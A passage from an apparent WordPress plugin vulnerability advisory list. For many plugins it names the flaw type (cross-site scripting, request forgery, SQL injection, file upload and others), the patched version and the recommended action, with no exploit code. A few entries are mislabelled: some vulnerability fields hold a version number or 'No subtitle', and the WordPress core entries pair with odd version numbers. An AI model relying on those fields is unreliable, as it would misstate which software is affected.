Recommended Action: Update to version 1.9.15, or a newer patched version

Plugin: WP Fast Cache

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: WPC Smart Wishlist for WooCommerce

Vulnerability: Cross-Site Request Forgery via wishlist_add and wishlist_remove
Patched Version: 4.7.2
Recommended Action: Update to version 4.7.2, or a newer patched version

Plugin: Image Photo Gallery Final Tiles Grid

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.4.19
Recommended Action: Update to version 3.4.19, or a newer patched version

Plugin: ND Shortcodes

Vulnerability: Unauthenticated WordPress Options Update
Patched Version: 6.0
Recommended Action: Update to version 6.0, or a newer patched version

Plugin: Download Monitor

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload via upload_file
Patched Version: 4.8.4
Recommended Action: Update to version 4.8.4, or a newer patched version

Plugin: Redirection Page

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Disable WordPress Update Notifications and auto-update Email Notifications

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Export any WordPress data to XML/CSV

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Quantity Plus Minus Button for WooCommerce by CodeAstrology

Vulnerability: Cross-Site Request Forgery via wqpmb_form_submit
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Social Sharing Toolkit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: fitness calculators

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.9.6
Recommended Action: Update to version 1.9.6, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: WP Cost Estimation

Vulnerability: Upload Directory Traversal
Patched Version: 9.660
Recommended Action: Update to version 9.660, or a newer patched version

Plugin: THE Leads Management System: 59sec LITE

Vulnerability: Authorization Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 1app Business Forms

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: One Click Plugin Updater

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Fastest Cache

Vulnerability: SQL Injection
Patched Version: 0.8.7.5
Recommended Action: Update to version 0.8.7.5, or a newer patched version

Plugin: Eventify™ – Simple Events

Vulnerability: Simple Events <= 1.7.f
Patched Version: 1.7.g
Recommended Action: Update to version 1.7.g, or a newer patched version

Plugin: Perelink Pro

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: ZM Ajax Login & Register

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Zoho Forms – Drag & Drop Form Builder for Websites – Contact Forms, Payment Forms, Order Forms & More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: WP Forum Server

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: directories

Vulnerability: Cross-Site Scripting via _drts_form_build_id, _t_ Parameters
Patched Version: 1.3.46
Recommended Action: Update to version 1.3.46, or a newer patched version

Plugin: Pinyin Slugs

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Dynamic QR Code Generator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LoginPress | wp-login Custom Login Page Customizer

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.1.16
Recommended Action: Update to version 1.1.16, or a newer patched version

Plugin: Display Users

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Sitewide Notice WP

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Defender Security – Malware Scanner, Login Security & Firewall

Vulnerability: Masked Login Area Security Feature Bypass
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.9.12
Recommended Action: Update to version 1.9.12, or a newer patched version

Plugin: Captcha Code

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: wp-Monalisa

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 6.2
Recommended Action: Update to version 6.2, or a newer patched version

Plugin: Good LMS – Learning Management System WP Plugin

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: Defender Security – Malware Scanner, Login Security & Firewall

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Calendar Event Multi View

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.01
Recommended Action: Update to version 1.4.01, or a newer patched version

Plugin: Contempo Real Estate Custom Posts

Vulnerability: Unauthorized File Upload
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: All-in-One WP Migration and Backup

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 7.41
Recommended Action: Update to version 7.41, or a newer patched version

Plugin: Seraphinite Alternative Slugs Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Ajax Archive Calendar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.6.8
Recommended Action: Update to version 2.6.8, or a newer patched version

Plugin: weebotLite

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All-in-One WP Migration and Backup

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 7.63
Recommended Action: Update to version 7.63, or a newer patched version

Plugin: Cloudflare Turnstile or reCAPTCHA For any Pages, to Block Spam and Hackers Attack.

Vulnerability: Missing Authorization via recaptcha_for_all_image_select
Patched Version: 1.23
Recommended Action: Update to version 1.23, or a newer patched version

Plugin: Olevmedia Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HubSpot – CRM, Email Marketing, Live Chat, Forms & Analytics

Vulnerability: Server Side Request Forgery
Patched Version: 8.8.15
Recommended Action: Update to version 8.8.15, or a newer patched version

Plugin: Rate My Post – Star Rating Plugin by FeedbackWP

Vulnerability: WP Rating System <= 3.4.1
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Symbiostock – Sell Photos Online For Free!

Vulnerability: Authenticated (Shop Manager+) Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Page Builder: Pagelayer – Drag and Drop website builder

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Video Embed

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Participants Database

Vulnerability: Unauthorized Cross-Site Scripting
Patched Version: 1.7.5.10
Recommended Action: Update to version 1.7.5.10, or a newer patched version

Plugin: masterslider

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BSK PDF Manager

Vulnerability: 2.9
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: WP Tools Increase Maximum Limits, Repair, Server PHP Info, Javascript errors, File Permissions, Transients, Error Log

Vulnerability: Missing Authorization to Select Plugin Installation
Patched Version: 3.43
Recommended Action: Update to version 3.43, or a newer patched version

Plugin: Post Grid and Gutenberg Blocks – ComboBlocks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.16
Recommended Action: Update to version 2.1.16, or a newer patched version

Plugin: WP e-Commerce – Store Exporter

Vulnerability: Missing Authorization
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Blocks

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Leaflet Maps Marker Pro

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Limit Login Attempts Reloaded

Vulnerability: Login Rate Limiting Bypass
Patched Version: 2.17.4
Recommended Action: Update to version 2.17.4, or a newer patched version

Plugin: Plainview Activity Monitor

Vulnerability: Remote Command Injection
Patched Version: 20180826
Recommended Action: Update to version 20180826, or a newer patched version

Plugin: Jazz Popups

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Woo Email Control

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.02
Recommended Action: Update to version 1.02, or a newer patched version

Plugin: RoyalSlider

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: Invit0r

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Reset Pro – Most Advanced WordPress Reset Tool

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.99
Recommended Action: Update to version 5.99, or a newer patched version

Plugin: No Page Comment

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Rotating Posts

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Dropdown Menu Widget

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All-in-One WP Migration and Backup

Vulnerability: Authorization Bypass to Arbitrary File Upload
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: WooCommerce Order Status Change Notifier

Vulnerability: Authenticated (Subscriber+) Arbitrary Order Status Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP RSS By Publishers

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download buttons for Youtube videos

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: Advanced Coupons – WooCommerce Coupons, Store Credit, Gift Cards, Loyalty Program, BOGO Coupons, Discount Rules

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5.0.1
Recommended Action: Update to version 4.5.0.1, or a newer patched version

Plugin: Opal Hotel Room Booking

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Blossom Recipe Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: WP Login Box

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Swifty Bar, sticky bar by WPGens

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.11
Recommended Action: Update to version 1.2.11, or a newer patched version

Plugin: Appointment Booking Calendar

Vulnerability: SQL Injection
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Responsive Cookie Consent

Vulnerability: Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Order Your Posts Manually

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘sortdata’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Leaflet Map

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Get Custom Field Values

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Custom Meta Widget
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Uncanny Toolkit for LearnDash

Vulnerability: Open Redirect
Patched Version: 3.6.4.4
Recommended Action: Update to version 3.6.4.4, or a newer patched version

Plugin: Subscribers – Free Web Push Notifications

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: WP Jobs

Vulnerability: Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Simple Vimeo Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery – Image and Video Gallery with Thumbnails

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: iframe

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via srcdoc
Patched Version: 4.9
Recommended Action: Update to version 4.9, or a newer patched version

Plugin: Google Analytics MU

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Mapwiz

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Missing Authorization
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: WP REST API (WP API)

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘resend’
Patched Version: 10.5.5
Recommended Action: Update to version 10.5.5, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.11.2.1
Recommended Action: Update to version 2.11.2.1, or a newer patched version

Plugin: Video PopUp

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Core: WordPress

Vulnerability: Supply Chain Compromise
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Postie

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.10
Recommended Action: Update to version 1.4.10, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Missing Capabilities Check to Information Disclosure
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: Woo Custom and Sequential Order Number

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: pb-embedflash

Vulnerability: Remote File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP htaccess Control

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Shield: Blocks Bots, Protects Users, and Prevents Security Breaches

Vulnerability: Missing Authorization
Patched Version: 17.0.18
Recommended Action: Update to version 17.0.18, or a newer patched version

Plugin: HT Mega – Absolute Addons For Elementor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: SALERT – Fake Sales Notification WooCommerce

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Scripting via image alt and title text
Patched Version: 2.2.45
Recommended Action: Update to version 2.2.45, or a newer patched version

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Link Library

Vulnerability: No subtitle
Patched Version: 5.9.13.27
Recommended Action: Update to version 5.9.13.27, or a newer patched version

Plugin: DZS Video Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.95
Recommended Action: Update to version 7.95, or a newer patched version

Plugin: Cart66 Lite :: WordPress Ecommerce

Vulnerability: SQL Injection
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Authenticated SQL Injection
Patched Version: 5.149
Recommended Action: Update to version 5.149, or a newer patched version

Plugin: Post Teaser

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ClickSold IDX

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.49
Recommended Action: Update to version 1.49, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via emailf
Patched Version: 1.3.2.1
Recommended Action: Update to version 1.3.2.1, or a newer patched version

Plugin: Woo Custom Emails

Vulnerability: Reflected Cross-Site Scripting via wcemails_edit
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Import External Images

Vulnerability: Cross-Site Request Forgery via external_image_import_all_ajax
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Banner – Easily add multiple Banners/Bars/Notifications/Announcements to the top or bottom of your website

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.12.0
Recommended Action: Update to version 2.12.0, or a newer patched version

Plugin: G Auto-Hyperlink

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Hijri

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Meow Gallery

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: Check & Log Email – Easy Email Testing & Mail logging

Vulnerability: Admin+ SQL Injection via Order and OrderBy parameters
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: SearchIQ – The Search Solution

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.9
Recommended Action: Update to version 3.9, or a newer patched version

Plugin: WordPress Bitcoin Payments – Blockonomics

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: Top Quark Architecture

Vulnerability: Arbitrary File Upload
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Block for Apple Maps

Vulnerability: Uncontrolled Resource Consumption
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Great Quotes

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Reusable Blocks Extended

Vulnerability: Cross-Site Request Forgery via reblex_reusable_screen_block_pattern_registration
Patched Version: 0.9.1
Recommended Action: Update to version 0.9.1, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Arbitrary Shortcode Execution
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: VM Backups

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Private Files – File Upload & Download Manager with Secure File Sharing

Vulnerability: Subscriber+ Arbitrary File Upload
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Side Cart Woocommerce | Woocommerce Cart

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Ninja Job Board – Ultimate WordPress Job Board Plugin

Vulnerability: Information Disclosure
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Cookie Notice & Consent Banner for GDPR & CCPA Compliance

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: E-Search

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Cross-Site Scripting
Patched Version: 8.0.16
Recommended Action: Update to version 8.0.16, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.71
Recommended Action: Update to version 3.0.71, or a newer patched version

Plugin: amCharts: Charts and Maps

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: WPIDE – File Manager & Code Editor

Vulnerability: Authenticated (Administrator+) Local File Inclusion
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Stream

Vulnerability: Missing Authorization to Sensitive Information Disclosure
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: Ultimate FAQ Accordion Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.25
Recommended Action: Update to version 1.8.25, or a newer patched version

Plugin: Restaurant Menu – Food Ordering System – Table Reservation

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Authentication Bypass
Patched Version: 5.15.2
Recommended Action: Update to version 5.15.2, or a newer patched version

Plugin: MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder

Vulnerability: Remote Code Execution
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Master Addons – Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.5
Recommended Action: Update to version 1.8.5, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Unauthenticated Arbitrary Media Deletion
Patched Version: 8.0.9
Recommended Action: Update to version 8.0.9, or a newer patched version

Plugin: Yoast Duplicate Post

Vulnerability: Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: WP Markdown Editor (Formerly Dark Mode)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Unauthenticated SQL Injection
Patched Version: 9.2.7
Recommended Action: Update to version 9.2.7, or a newer patched version

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.21
Recommended Action: Update to version 2.0.21, or a newer patched version

Plugin: Product Enquiry for WooCommerce

Vulnerability: Unauthenticated Stored Cross-Site Scripting via name
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 3.1.11
Recommended Action: Update to version 3.1.11, or a newer patched version

Plugin: Dynamic Font Replacement DFR4WP EN

Vulnerability: Arbitrary File Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce PensoPay

Vulnerability: Reflected Cross-Site Scripting via ‘pensopay_action’
Patched Version: 6.3.2
Recommended Action: Update to version 6.3.2, or a newer patched version

Plugin: Bold Page Builder

Vulnerability: Missing Authorization to Settings Update
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: th23 Social

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ad-minister

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: teachPress

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 8.1.9
Recommended Action: Update to version 8.1.9, or a newer patched version

